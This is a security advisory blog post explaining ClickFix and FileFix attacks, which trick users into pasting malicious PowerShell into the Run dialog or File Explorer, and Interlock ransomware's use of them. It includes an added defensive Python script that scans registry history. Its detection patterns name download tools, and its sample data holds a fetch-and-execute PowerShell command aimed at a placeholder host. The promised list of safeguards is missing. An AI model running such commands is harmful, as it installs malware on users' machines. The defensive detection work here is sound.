ClickFix and FileFix: How Hackers Get Victims to Infect Their Own Computers
ClickFix and FileFix attacks trick users into self-infecting devices. Learn how they work, why they spread, and how to help defend against them.
Over time, improved security practices have effectively closed off some methods threat actors had used to gain initial access to systems. As we discussed in our recent quarterly report, though, social engineering has persisted: by attacking human weaknesses, threat actors take advantage of an element of IT security that isn’t entirely solvable through investing in new technology solutions. An example of how threat actors are expanding upon social engineering schemes is the “ClickFix” technique — and its newer cousin “FileFix” — which use seemingly helpful prompts to trick people into running malicious code, opening the door for data theft, ransomware and other attacks.
The social engineering and malware distribution technique now known as “ClickFix” first emerged in 2024 as a method of deceiving users into unwittingly downloading credential-stealing malware onto their devices. By the spring of 2025, the technique had become widespread and was additionally being used by threat actors to deploy remote access trojans (RATs), which can be used to gain initial footholds within target environments.
ClickFix campaigns can take many forms. Typically, users are directed to a malicious or compromised website via malvertising (where harmful code is injected into legitimate online advertisements) or after clicking a link contained in a phishing email. The website then presents the user with a fake CAPTCHA or fake browser error message that claims it can only be “fixed” by pressing a combination of keyboard shortcuts. Users who follow those instructions will ultimately paste malicious code into the Windows “Run” dialog. Once the code is run, a PowerShell command downloads and executes a malware payload.
In June 2025, a variation of the ClickFix technique — dubbed “FileFix” — was described by a security researcher. FileFix schemes are presented to the user in largely the same context as their ClickFix cousins. But rather than pasting the malicious code into the Windows “Run” dialog, users are instead instructed to click a button that opens the Windows File Explorer, and then press a series of keyboard shortcuts that will paste the code into File Explorer’s address bar. Once executed, the malicious payload will be deployed to the user’s device.
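For defenders, both paste targets leave a per-user trace: Windows keeps Run-dialog history in the RunMRU registry key and File Explorer address-bar history in TypedPaths. The following triage sketch is an added example, not code from the original article; it assumes those values have already been exported as (key, value name, data) tuples, and the sample entries and the example.invalid host are constructed.

```python
import re

# Per-user (HKCU) keys recording what was typed or pasted.
RUN_MRU = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"          # Run dialog
TYPED_PATHS = r"Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths"  # address bar

INTERPRETER = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|curl|certutil|bitsadmin"
    r"|msiexec|rundll32|regsvr32)(\.exe)?\b", re.I)
REMOTE = re.compile(r"https?://|\\\\[\w.-]+\\", re.I)
HIDING = re.compile(
    r"\s-w(in\w*)?\s+h|\s-(e|ec|enc\w*)\s|frombase64string|\biex\b|invoke-expression",
    re.I)

def triage(entries):
    """Return history entries that look like a pasted command, not normal use."""
    findings = []
    for key, name, data in entries:
        if name.lower() == "mrulist":          # ordering metadata, not a command
            continue
        # RunMRU data carries a trailing "\1" marker; strip it before matching.
        command = (data[:-2] if data.endswith("\\1") else data).strip()
        reasons = []
        # A bare "cmd" or a UNC path is ordinary use; an interpreter combined
        # with a remote location or hidden/encoded input is not.
        if INTERPRETER.search(command):
            if REMOTE.search(command):
                reasons.append("interpreter with remote location")
            if HIDING.search(command):
                reasons.append("hidden window or encoded/evaluated input")
        if reasons:
            source = ("ClickFix (Run dialog)" if key.endswith("RunMRU")
                      else "FileFix (Explorer address bar)")
            findings.append({"source": source, "value": name,
                             "command": command, "reasons": reasons})
    return findings

# Constructed sample export: benign history mixed with two pasted commands.
SAMPLE = [
    (RUN_MRU, "MRUList", "cba"),
    (RUN_MRU, "a", "notepad\\1"),
    (RUN_MRU, "b", "\\\\fileserver\\share\\1"),
    (RUN_MRU, "c", "powershell -w hidden -enc CONSTRUCTED_PLACEHOLDER\\1"),
    (TYPED_PATHS, "url1", "C:\\Users\\alice\\Documents"),
    (TYPED_PATHS, "url2", "cmd"),
    (TYPED_PATHS, "url3", 'powershell.exe -c "iwr https://example.invalid/a | iex"'),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding["source"], finding["value"], finding["reasons"])
```

A hit in either key means a user pasted and ran a command, so it is best treated as a lead for endpoint investigation rather than a verdict.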
Threat actors have been adopting the ClickFix and FileFix techniques because they are effective. As an article from Proofpoint in 2024 explained, these techniques are particularly insidious because they are “preying on people’s innate desire to be helpful and independent.” Because users are provided with all the steps to “fix” the purported problem they are facing, they feel equipped to do so without involving their IT teams. Moreover, many common security protections are bypassed, since the victim is the one taking action on their own computer.
Interlock, a ransomware group that first emerged in September 2024 and has become a growing threat to businesses across North America and Europe, has been observed using the ClickFix and FileFix techniques to gain initial access to its victims’ environments. Those who are deceived by the method and unintentionally deploy Interlock’s RAT to their devices can find themselves subject to the group’s double extortion model, in which victims are pressured to pay a ransom to decrypt their data or to prevent it from being leaked after being exfiltrated.
For this reason, organizations should focus on educating users to recognize the ClickFix and FileFix techniques specifically — and on the general danger inherent in copying, pasting and executing commands from untrusted websites.
There are also technical safeguards to consider. Security researchers have found that certain domains are commonly abused in these schemes; these can be blocked at the firewall level (see an example of one common domain in this article). In addition to blocking certain high-risk domains, we recommend the following technical safeguards:
This material is for general informational purposes only and is not legal advice. It is not designed to be comprehensive and it may not apply to your particular facts and circumstances. Consult as needed with your own attorney or other professional advisor. No sponsorship, affiliation or endorsement relationship exists as between Travelers and any of the entities referenced in this material.
Further reading:
This Windows PowerShell Phish Has Scary Potential, Krebs on Security (Sept. 2024).
ClickFix: How to Infect Your PC in Three Easy Steps, Krebs on Security (Mar. 2025).
Phishing campaign impersonates Booking.com, Microsoft (Mar. 2025).
Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape, Proofpoint (Nov. 2024).
Interlock ransomware adopts new FileFix attack to push malware, Bleeping Computer (Jul. 2025).
New FileFix Delivery Method Used to Distribute Interlock RAT, Arctic Wolf (Jul. 2025).
#StopRansomware: Interlock, CISA (Jul. 2025).
Threat Actor Profile: Interlock Ransomware, Arctic Wolf (Aug. 2025).